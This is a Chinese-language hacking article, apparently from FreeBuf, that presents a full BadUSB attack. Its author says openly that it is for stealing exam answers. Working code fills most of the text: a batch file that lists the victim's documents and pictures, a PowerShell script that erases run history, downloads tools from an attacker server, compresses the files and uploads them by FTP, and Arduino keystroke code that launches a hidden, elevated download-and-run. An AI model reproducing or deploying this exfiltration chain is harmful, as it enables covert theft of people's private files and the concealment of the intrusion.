HID高级攻击姿势：利用PowerShell脚本进行文件窃取

0×01 引言

又到了期中考试了，我又要去偷答案了，一直发现远程下载运行exe的方式不太好，容易报毒所以这里打算用ps脚本。

0×02 关于HID

HID是Human Interface Device的缩写，由其名称可以了解HID设备是直接与人交互的设备，例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口，只要符合HID类别规范的设备都是HID设备。一般来讲针对HID的攻击主要集中在键盘鼠标上，因为只要控制了用户键盘，基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中，当用户将含有攻击向量的鼠标或键盘，插入电脑时，恶意代码会被加载并执行。

0×03 准备工具

一台外网主机(直接电脑接网线宽带拨号也可以)

一个HID攻击工具(烧鹅或者Badusb)

FTPserver(搭建一个FTP服务器用来接收窃取到的文件)

PHPstudy(搭建http服务器用来存放ps脚本等)

7z.exe / 7z.dll(存放到http服务器下,之后会利用它来进行压缩后在上传，尽量减小上传速度)

0×04 代码部分(以下代码可能具有攻击性,请勿用于非法用途)

1.[get.bat](获取需要的文件存放位置，并保存到c:/temp.bat)[该代码存放于服务器http根目录下]

dir /s /a /b "%userprofile%/desktop/*.txt">c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.doc">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.docx">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.xls">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.xlsx">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.ppt">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.xls">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.eet">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.et">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.xlt">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.pdf">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.jpg">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.jpeg">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.png">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.bmp">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.gif">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.rtf">>c:/temp.bat dir /s /a /b "%userprofile%/desktop/*.htl">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.txt">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.doc">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.docx">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.xls">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.xlsx">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.ppt">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.xls">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.eet">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.et">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.xlt">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.pdf">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.jpg">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.jpeg">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.png">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.bmp">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.gif">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.rtf">>c:/temp.bat dir /s /a /b "%userprofile%/Documents/Tencent Files/*.htl">>c:/temp.bat 

2.[get.ps1](清除运行记录，下载服务器中的7z.dll / 7z.exe / get.bat到c盘到相应位置,处理c:/temp.bat为7z压缩为c:/Ram.7z,上传c:/Ram.7z到FTP服务器根目录下,删除所有下载的文件!!!一共需要改4处IP地址!!!)[该代码存放于服务器http根目录下记得设置FTP服务器密码为admin admin]

reg delete HKCU/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU /f; (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.dll','c:/7z.dll'); (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.exe','c:/7z.exe'); (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/get.bat','c:/Users/Public/get.bat'); C:/Users/Public/get.bat;$array="";foreach($u in(get-content c:/temp.bat)){[array]$array +='c:/7z a -t7z c:/Ram.7z "'+$u+'"'};$array | Out-File -Encoding default c:/temp.bat;c:/temp.bat; $fileinf=New-Object System.Io.FileInfo("C:/Ram.7z"); $ftp = [System.Net.FtpWebRequest] [System.Net.FtpWebRequest]::Create("ftp://192.168.1.1/"+$fileinf.name) $ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile $ftp.Credentials = new-object System.Net.NetworkCredential("admin","admin") $ftp.UseBinary = $true $ftp.UsePassive = $true $content = [System.IO.File]::ReadAllBytes($fileInf.fullname) $ftp.ContentLength = $content.Length $rs = $ftp.GetRequestStream() $rs.Write($content, 0, $content.Length) $rs.Close() $rs.Dispose() Remove-Item c:/temp.bat Remove-Item c:/Ram.* Remove-Item c:/7z.* Remove-Item c:/Users/Public/get.*

3.[get.ino](以管理员权限下载get.ps1到本地c:/users/public目录!!!需要改1处IP地址!!!UAC闪过之后要记得拔出)[修改IP后直接刷入]

void setup() {//初始化   Keyboard.begin();//开始键盘通讯    delay(5000);//延时   Keyboard.press(KEY_LEFT_GUI);//win键    delay(500);    Keyboard.press('r');//r键    delay(500);    Keyboard.release(KEY_LEFT_GUI);   Keyboard.release('r');   Keyboard.press(KEY_CAPS_LOCK);   Keyboard.release(KEY_CAPS_LOCK);   delay(500);    Keyboard.println("POWERSHELL -NOP");   delay(800);   Keyboard.println();   delay(800);   Keyboard.println("START-PROCESS -fILEpATH POWERSHELL /" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(/'HTTP://192.168.1.1/GET.PS1/',/'C://USERS//PUBLIC//GET.PS1/');./GET.PS1;EXIT/" -vERB RUNAS;EXIT");   Keyboard.press(KEY_CAPS_LOCK);   Keyboard.release(KEY_CAPS_LOCK);   Keyboard.end();//结束键盘通讯  } void loop()//循环 {   Keyboard.release(KEY_LEFT_ALT);   Keyboard.press(KEY_LEFT_ALT);   Keyboard.print('y');   Keyboard.release(KEY_LEFT_ALT);   Keyboard.release(KEY_LEFT_ALT);   Keyboard.release(KEY_LEFT_ALT);   Keyboard.release(KEY_LEFT_ALT);   delay(50); }

mrzcpo投递，转载请注明来自Freebuf.COM(黑客与极客)